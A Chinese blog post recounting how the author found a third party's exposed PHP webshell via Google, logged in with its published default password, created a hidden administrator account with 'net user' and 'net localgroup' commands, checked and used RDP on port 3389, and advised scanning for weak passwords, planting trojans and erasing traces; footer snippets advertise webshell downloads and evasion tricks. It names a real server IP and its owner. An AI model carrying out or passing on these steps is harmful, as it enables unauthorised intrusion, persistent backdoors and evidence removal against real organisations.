我用PhpWebshell抓肉鸡

最新推荐文章于 2024-07-29 11:58:37 发布
最新推荐文章于 2024-07-29 11:58:37 发布
阅读量1.9k 收藏 1
点赞数 1
分类专栏: 安全测试

通过本文你可以学到
1.了解Phpwebshell
2.如何获取他人的肉鸡
    一直以来,我都很希望天上能够掉一下一个“鸡馅饼”,直到今天才得以实现。偶不敢一个人独享,因此将其过程写出来跟大家一起分享。我在使用阿杰专用phpwebshell时,由于其源代码进行了加密,而在源文件开始处注明了默认密码为“456655”(图1),我想很多菜鸟包括一些老鸟,都会因为重新解密比较麻烦而未修改控制密码。如果能够在网上找到webshell地址,也许能够获得控制权。

1.JPG

图1 阿杰专用PhpWebshell 默认密码
(一)使用搜索引擎查找Webshell
    我先用百度搜索了“阿杰专用phpshell”,其结果中显示没有相关地址。我换成Google,呵呵,出来了两个(图2),从上往下依次单击连接进入相应页面,第一个google搜索出来的记录的链接地址网页文件只能下载,不能正常浏览,第二个地址可以浏览。

2.jpg

图2 使用Google搜索phpshell
(二)进行相关信息收集
1.IP地址定位
   搜索结果140.127.80.42/yeh/uploads/upfile/4_showdata.php中包含了IP地址140.127.80.42,说明该网站服务器IP地址就是140.127.80.42,通过www.ip138.com进一步确认网站属于“中華民國環境教育學會”,判断好网站的类型,才好进行进一步的控制或者检查。
说明:判断类型至关重要,有一些网站我们是不能够随便弄的,弄了以后比较麻烦。在看清楚网站类型以后,如果觉得该服务器可以随便折腾,嘿嘿,随便干什么都可以。
2.做好自我防护
   在进行安全检查或者入侵时,一定要做好自我防护,很多存在安全漏洞的网站都被先期入侵者攻克,服务器往往被大量挂马,如果入侵服务器的是高手,弄一些0day来挂,呵呵,估计你就惨了,因此我们在入侵或者研究技术时,尽可能在肉鸡或者虚拟机上面进行。我通过在浏览器中直接输入IP后,结果出来一个很炫的东东(图3)!当然我的杀毒软件检测出来该网页已经被人挂马。

3.jpg

图3 黑客留言
(三)深入“敌人”阵地
    1.进入webshell管理
当我们不了解对方时,都可以当成敌人,哈哈。在浏览器中输入查询的结果140.127.80.42/yeh/uploads/upfile/4_showdata.php,输入默认密码“456655”,芝麻开门,进入webshell管理。

4.jpg

图4 进入webshell
说明:在网页上面有一些错误提示,可以不管它。
2.执行命令
    进入webshell后,最关键的是判断webshell有什么样的权限,否则弄半天也不能完全控制服务器就没有什么意思了。在webshell控制主界面中单击“webshell”在命令中输入“net user”并单击“运行”按钮,看看有什么用户(图5),然后再次输入“net user aspnet aspnet /add”添加用户,输入“net localgroup administrators aspnet /add”命令将aspnet用户提升为管理员权限(图6)。

5.jpg

图5 查看系统用户

6.jpg

图6 添加管理员账号
说明:在繁体中文中,如果添加用户中出现了“Ln”字样,就表明账号添加成功。
再次输入“net localgroup administrators”查看目前具有管理员权限的用户(图7),在结果中我们看见了看看添加的用户“aspnet”。

7.jpg

图 7 查看管理员用户是否添加成功
3.检查3389远程终端开放情况
   对于检查3389远程终端情况有很多种,我不赘述,由于可以直接执行命令,因此在webshell种输入“netstat –an” 或者“netstat –an |find "3389"”查看3389端口是否打开。在本例中,我们可以看到该计算机3389端口是打开的(图8)。

8.jpg

图8 查看本地3389端口开放情况
     本地开放了3389端口也不一定能够从远端连接,因此还需要在肉鸡或者自己的计算机上查看该IP地址对外端口开放情况。我们使用“sfind –p 140.127.80.42”查看端口开放情况,出来的结果中表明我们能够连接该远程终端服务(图9)。

9.jpg

图9 在本机上查看远端3389开放情况
4.使用3389登陆
   既然开放了3389端口,还等什么,直接连接吧。输入用户名和密码,ok,直接进入该计算机(图10)。

10.jpg

图10 通过3389进入该计算机
(四)渗透和扫尾
   使用net view看看服务器网络情况(图11),看看是否存在弱口令,进行sql弱口令扫描,arp挂马等等。由于该计算机已经被人挂马在先,因此该计算机只能是试验的场所。所以在操作时应该小心为主,最后清除自己在入侵过程留下的痕迹。

11.jpg

图11 查看网路情况

(五)结束语
    本文仅仅是一个控制肉鸡的思路,通过默认的口令来实施控制。从“高手”中收获肉鸡,其技术难度非常低。所以说,入侵不一定要技术高,关键要想得到,思维和创新是入侵成功的必然条件。 

蓝冰咖啡
关注
专栏目录
phpwebshell
06-08
不错的webshell,希望能有帮助到你!
php webshell
11-24
php webshell 需要的朋友可以下载!
关于PHP中的webshell
weixin_33824363的博客
05-16 9522
一、webshell简介 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放...
傻瓜式PHP-Webshell免杀学习手册,零基础小白也能看懂
最新发布
qq_69775412的博客
07-29 817
首先,要知己知彼,才能针对性做出策略来使得WebShell成功免杀通过对上面所说两部分敏感内容的拼接、混淆以及变换,来绕过WAF的检测逻辑,如下:​​​​​​​$tmp = "";$a = $a/10;//sysTem(高危函数)$f($_POST['aabyss']);同样,可以配合文件名玩出一些花活,我们建一个PHP名字为976534.php​​​​​​​$tmp = "";$a = $a/10;
php 实现webshell
echo_heng的博客
12-15 2301
php实现webshell主要依靠swoole和ssh2扩展,前端展示页面使用xterm 废话不多说直接上代码 后端代码 <?php /** * websocket服务器(使用swoole) * 使用ssh登录服务器 */ class Ws{ private $shell; private $connection; private $isConnection; private $ws; public function __construct(){
PHP webshell
yxwb1253587469的博客
07-21 1075
简单版 /*-------------------------------------------- Codz By pr0cess MSN:l4ndishezhang@hotmail.com Modified By Badboy Date:2009/23/06 ---------------------------------------------- */ header("Content-
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
对于系统管理员来说,理解和识别这类免杀Webshell的特征至关重要,以便采取有效的预防和应对措施,如加强输入验证、更新安全补丁、使用行为分析的检测工具等,以保护服务器免受此类攻击。同时,对Webshell进行深入...
awd_worm_phpwebshell_framework-master.zip
07-13
awd_worm_phpwebshell_framework-master
phpwebshell源码
09-14
PHP Webshell尤其常见,因为PHP是一种广泛使用的服务器端脚本语言,很多网站都基于PHP构建。 **1. PHP Webshell的工作原理** PHP Webshell的工作原理是利用网站存在的安全漏洞,比如SQL注入、命令注入、文件包含...
php webshell 下载(目前功能强大齐全的phpwebshell
11-09
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,好不容易找到这功能齐全的php版的webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
各种php webshell大全
10-14
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,这是我收藏的各种webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
强大的php webshell
06-22
phpwebshell 就一个文件,可以管理服务器文件管理增删改,服务器mysql管理,创建服务器账户,批量挂马、清马,检测端口号,执行cmd命令等,超乎你的想象
php webshell 下载(自测 功能强大齐全的phpwebshell
06-30
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,不接黑)
wso_webshell_php_
10-01
Webshell
php 导致服务器成肉鸡,把我的服务器搞成了ddos肉鸡,如何解决?
weixin_33304896的博客
03-18 105
把我的服务器搞成了ddos肉鸡,如何解决?(2012-04-11 04:29:58)标签:服务器ddos如何杂谈把我的服务器搞成了ddos肉鸡,如何解决?我的服务器是centos 5.2,上面装有apache,php服务器,tomcat,现在出现这样的现象,只要我的服务器一开机,那么同机房的服务器就上不了网了,而且看到进程里有个stealth的进程,用的是apache的用户,该cpu占用一直99%...
php探针提权服务器,一个探针足矣毁掉一台服务器
weixin_39930252的博客
03-13 237
探针,可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息,还能进行服务器性能测试。深受各种站长的喜爱,我也不例外…… 也许很多站长也和我一样,喜欢在自己的网站上放个探针,有事无事观察观察自己的环境,亦或者公开给大家观探针,可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息,还能进行服务器性能测试。深受各种站长的喜爱,我也不例外……也许很多站长也和我一...
php 导致服务器成肉鸡,某Linux服务器被变成肉鸡的过程
weixin_35676943的博客
03-18 305
安装了Oracle数据库的Linux服务器,由于密码过于简单,导致被变成肉鸡。***者登录记录由Logwatch发到了管理员信箱,被管理员发现。***者的操作步骤都记录在.bash_history文件里。提醒:所有帐号口令一定要有强度,避免被猜到。一定要启用日志分析程序。启用Iptables进行安全策略部署。***者操作步骤如下:cd /var/tmpwget [url]www.bcsteel.c...
Webshell检测策略:特征分析与加密识别
例如,PHPwebshell的截图展示了其丰富的功能,对于网站管理员来说,这是必须防范的对象。 文章重点介绍了两种常用的webshell检测方法: 1. 文件重合指数(IC)检测:IC是一种用于识别文件是否被加密的统计工具。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值